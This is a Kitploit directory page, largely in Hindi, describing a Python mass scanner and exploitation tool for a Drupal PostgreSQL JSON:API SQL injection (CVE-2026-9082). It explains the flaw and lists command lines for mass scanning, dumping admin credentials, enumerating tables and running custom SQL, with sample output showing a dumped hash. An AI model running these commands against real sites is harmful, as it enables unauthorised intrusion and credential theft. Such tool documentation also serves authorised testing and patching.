Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
drupal-jsonapi-sqli-scanner — स्कैनर: CVE-2026-9082 Drupal PostgreSQL JSON:API के माध्यम से SQLi — अनधिकृत SQLi के लिए Python स्कैनर जो RCE (CISA KEV) की ओर ले जाता है | Kitploit
उपकरण/GitHubGitHub/ridhinva/drupal-jsonapi-sqli-scanner
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंगडेटाबेस सुरक्षा
GitHub
ridhinva/drupal-jsonapi-sqli-scanner

drupal-jsonapi-sqli-scanner

स्कैनर: CVE-2026-9082 Drupal PostgreSQL JSON:API के माध्यम से SQLi — अनधिकृत SQLi के लिए Python स्कैनर जो RCE (CISA KEV) की ओर ले जाता है

रिपॉजिटरी देखें
2161 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-9082 Critical CISA KEV Affected Versions License

CVE-2026-9082 — Drupal PostgreSQL SQL इंजेक्शन

मास स्कैनर और एक्सप्लॉइटेशन टूल

Drupal Core (PostgreSQL) में अनप्रमाणित SQL इंजेक्शन
PDO प्लेसहोल्डर नाम के दुरुपयोग के माध्यम से JSON:API फ़िल्टर ऐरे कुंजी इंजेक्शन


अवलोकन

CVE-2026-9082 Drupal Core में एक अत्यधिक गंभीर SQL इंजेक्शन भेद्यता है, जो Drupal 8.0 से 11.3.9 चलाने वाली सभी PostgreSQL-आधारित साइटों को प्रभावित करती है। इसे 2026-05-22 को CISA Known Exploited Vulnerabilities (KEV) कैटलॉग में जोड़ा गया — वास्तविक दुनिया में सक्रिय रूप से शोषित की जा रही है।

प्रभाव

गंभीरताCVSSप्रमाणीकरण आवश्यकहमला वेक्टर
गंभीर9.8+कोई नहींHTTP (JSON:API)
  • डेटा एक्सफिल्ट्रेशन — डेटाबेस, उपयोगकर्ता, पासवर्ड हैश निकालना
  • विशेषाधिकार वृद्धि — एडमिन खाते बनाना, सामग्री संशोधित करना
  • रिमोट कोड निष्पादन — कुछ कॉन्फ़िगरेशन में pg_exec() या COPY ... PROGRAM के माध्यम से

प्रभावित संस्करण

स्थितिसंस्करण
❌ असुरक्षितDrupal 8.0.0 → 11.3.9 (PostgreSQL बैकएंड)
✅ पैच किया गया11.3.10, 11.2.12, 10.6.9, 10.5.10

यह कैसे काम करता है

यह दोष core/modules/pgsql/src/EntityQuery/Condition.php में मौजूद है। translateCondition() विधि JSON:API फ़िल्टर पैरामीटरों से उपयोगकर्ता-नियंत्रित ऐरे कुंजियों का उपयोग करके PDO प्लेसहोल्डर नाम बनाती है। PDO केवल [a-zA-Z0-9_] को प्लेसहोल्डर नाम के रूप में पार्स करता है, इसलिए ) के बाद का कोई भी सफिक्स क्वेरी में इंजेक्ट किया गया शाब्दिक SQL बन जाता है।

root@kitploit:~
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

विशेषताएँ

  • ✅ मास स्कैनर — एक साथ सैकड़ों लक्ष्यों को स्कैन करें
  • ✅ एकल लक्ष्य मोड — अलग-अलग Drupal साइटों की जाँच करें
  • ✅ टाइम-आधारित डिटेक्शन — pg_sleep() ब्लाइंड SQLi पुष्टि
  • ✅ बूलियन-आधारित डिटेक्शन — पंक्ति गणना तुलना
  • ✅ संस्करण निष्कर्षण — PostgreSQL संस्करण की पहचान करें
  • ✅ डेटाबेस जानकारी — वर्तमान उपयोगकर्ता और डेटाबेस नाम निकालें
  • ✅ एडमिन क्रेडेंशियल डंप — उपयोगकर्ता नाम, ईमेल, पासवर्ड हैश (uid=1)
  • ✅ टेबल सूची — सभी पब्लिक टेबलों की गणना करें
  • ✅ कस्टम SQL क्वेरीज़ — कोई भी निष्कर्षण क्वेरी चलाएँ
  • ✅ प्रॉक्सी सपोर्ट — Burp Suite या इसी तरह के टूल के माध्यम से रूट करें
  • ✅ फ़ाइल में आउटपुट — मास स्कैन परिणाम सहेजें
  • ✅ रंगीन टर्मिनल आउटपुट — परिणाम पढ़ने में आसान

इंस्टॉलेशन

आवश्यक शर्तें

  • Python 3.8+
  • pip (पायथन पैकेज मैनेजर)

डिपेंडेंसी इंस्टॉल करें

root@kitploit:~
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

बस इतना ही! केवल एक डिपेंडेंसी — requests।


उपयोग

🕵️ एकल लक्ष्य की जाँच करें

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 कई लक्ष्यों का मास स्कैन

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt

targets.txt प्रारूप:

root@kitploit:~
https://target1.com
target2.com
192.168.1.100

🔓 PostgreSQL संस्करण निकालें

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ डेटाबेस जानकारी निकालें

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 एडमिन क्रेडेंशियल डंप करें (uid=1)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 सभी टेबलों की सूची बनाएं

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 कस्टम SQL क्वेरी

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

परिणाम फ़ाइल में सहेजें

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

प्रॉक्सी का उपयोग करें (Burp Suite)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

टाइमिंग अनुकूलित करें

root@kitploit:~
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

कमांड संदर्भ

फ़्लैगविवरण
-u, --urlएकल लक्ष्य URL
-f, --fileलक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक)
-o, --outputस्कैन परिणाम फ़ाइल में सहेजें
--checkजाँचें कि लक्ष्य असुरक्षित है या नहीं
--versionPostgreSQL संस्करण निकालें
--dbinfoDB उपयोगकर्ता और डेटाबेस नाम निकालें
--adminDrupal एडमिन क्रेडेंशियल निकालें (uid=1)
--tablesसभी डेटाबेस टेबलों की सूची बनाएं
--queryकस्टम SQL निष्कर्षण क्वेरी
--threadsमास स्कैन के लिए थ्रेड (डिफ़ॉल्ट: 20)
--timeoutHTTP अनुरोध टाइमआउट (डिफ़ॉल्ट: 30s)
--delayडिटेक्शन के लिए pg_sleep विलंब (डिफ़ॉल्ट: 5s)
--no-ssl-verifyTLS प्रमाणपत्र सत्यापन छोड़ें
--proxyHTTP प्रॉक्सी (जैसे, http://127.0.0.1:8080)

उदाहरण आउटपुट

असुरक्षित लक्ष्य

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

एडमिन क्रेडेंशियल डंप

root@kitploit:~
[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

संदर्भ

स्रोतलिंक
Drupal सलाहSA-CORE-2026-004
CISA KEVCVE-2026-9082
पैच कमिटea9524d9
NVD प्रविष्टिCVE-2026-9082
खोजकर्ताMichael Maturi

⚠️ अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण, शैक्षिक उद्देश्यों और नैतिक शोध के लिए है।

कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक कोई दायित्व नहीं लेते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।


लेखक

Ridhin V A (@ridhinva) — बग बाउंटी शिकारी और सुरक्षा शोधकर्ता

इसे इसलिए बनाया गया क्योंकि CISA KEV ने कहा कि इसका वास्तविक दुनिया में शोषण हो रहा है। अपनी Drupal साइटों को पैच करें।

टूल डाउनलोड करें